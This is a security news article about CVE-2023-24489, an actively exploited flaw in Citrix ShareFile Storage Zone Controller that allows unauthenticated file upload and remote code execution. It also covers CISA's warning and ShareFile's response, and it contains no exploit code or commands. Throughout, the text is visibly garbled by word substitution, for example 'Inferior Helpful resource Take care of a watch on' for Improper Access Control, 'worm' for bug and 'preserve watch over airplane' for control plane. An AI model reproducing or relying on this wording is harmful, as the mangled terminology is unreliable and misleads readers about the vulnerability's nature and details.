Critical Citrix ShareFile Flaw Exploited in the Wild: CISA Warns

Organizations use Citrix ShareFile, a cloud-basically based entirely platform, to store and share expansive recordsdata. It also permits users to glean branded, password-safe recordsdata thru their companies and products.

ShareFile Storage Zone permits administrators to opt between ShareFile-managed, stable cloud or IT-managed storage zones (On-Prem) within an organization’s records heart.

ShareFile Storage Zone Controller is a long ShareFile Software as a Carrier cloud storage that provides personal records storage with a ShareFile tale.

However, ShareFile has been stumbled on with a first-rate security flaw that permits threat actors to compromise customer-managed ShareFile Storage Zone controllers remotely.

As successfully as, this vulnerability has been added to the listing of Known Exploited vulnerabilities by the CISA (Cybersecurity and Infrastructure Safety Company).

CVE-2023-24489: Inferior Helpful resource Take care of a watch on

Citrix ShareFile Storage Zone Controller is a .NET application that runs beneath IIS and uses AES encryption with CBC (Cipher Block Chaining) mode PKCS#7 (Public-Key Cryptography Identical old) padding, which has a worm in validating the decrypted records.

Hence, this unauthenticated arbitrary file add main to a long way off code execution on Citrix ShareFile Storage Zone Controller exists as a consequence of an error in handling cryptographic operations.

NVD gave the severity for this vulnerability as 9.8 (Extreme), as reported to Cyber Safety News by GreyNoise.

As per the research from AssetNote, this vulnerability used to be initially keep started with a Path Traversal on the parentId parameter by method of add.targetPath member variable. Furthermore, the encryption and authentication were researched and stumbled on with this cryptographic worm main to a long way off code execution.

As successfully as, a PoC(Proof-of-conception) has been published on GitHub, opening a huge dwelling for threat actors to draw this vulnerability in susceptible cases. As per the AssetNote file, 1000-6000 ShareFile Storage Zone Controllers cases had been uncovered on the on-line.

Citrix has launched patches for a vulnerability that is affecting Citrix ShareFile Roar material Collaboration. On the opposite hand, community entry to the ShareFile storage zones controller is required to milk this vulnerability.

Customers of this product are instructed to reinforce to the latest model of Citrix to forestall threat actors from exploiting it.

ShareFile’s Response to the Incident

“We take security very severely right here at ShareFile. Sooner than the CVE launch, we had patched, validated, and ran intensive testing against the product to validate its safety. Keeping our possibilities’ records is a cornerstone of our products.”

Model 5.11.24

“We worked with and notified impacted possibilities sooner than the launched CVE to update to the latest model of our application to mutter the safety of their records. Our preserve watch over airplane is no longer linked to any ShareFile StorageZones Controller (SZC) that’s no longer patched. We want to remind our possibilities that they want to make certain that they entirely shut down any machine working an older model of the SZC application that has been disconnected from the ShareFile preserve watch over airplane.”